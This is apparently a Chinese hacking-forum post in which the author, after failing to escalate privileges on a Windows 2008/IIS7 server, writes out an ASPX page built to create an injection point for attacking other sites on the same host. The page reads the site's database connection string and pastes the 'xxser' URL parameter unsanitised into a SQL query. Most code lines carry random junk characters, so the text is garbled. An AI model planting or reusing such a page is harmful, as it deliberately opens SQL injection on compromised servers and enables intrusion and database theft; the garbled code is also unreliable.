利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
代码量不多，自己写个拉倒了。烦死了。

' u* h2 H# g- R1 I9 \​
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
, ]* l  ~$ O; v- ^% [# g& N5 z</head>
<body>
    <form id="form1" runat="server">
" K2 [! j! k) s9 R; |2 J    <div>
; a* y% Q0 I1 e0 s6 r5 d     <script language="c#" runat="server">
) j$ F) C. r7 y            
         void page_init(object sender, EventArgs e)
  j1 ~3 h+ E) t$ ^; ^! o" b" W3 @$ ?         {
            
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
8 ]  }; T, o( a* G& ~! Y' f            
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
/ H0 d' ]. i1 d- }+ _2 l& C- M             conn.Open();
5 X+ m/ K9 A5 H: M            
             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
7 d, c7 t. ]& O& C+ ^" S            
7 X9 L7 t' _( J& N7 S' ?4 y9 r' U             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
& t3 M9 F4 ?) E) ^# m             int x = command.ExecuteNonQuery();
             Response.Write(i+"\n");
1 i% k$ k: U2 o. F2 ^  f; @             Response.Write(x);
& p9 R) }+ s3 D             conn.Close();
         }
     
7 a7 u2 k6 n+ _. L: D. i" j  </script>
& a( R3 B$ d" U( j3 a9 N" @    </div>
$ F) B4 }2 ]9 N' `' K( P    </form>
% }4 f/ U+ \7 A# H</body>
</html>
; p) R  Y9 d; ?6 w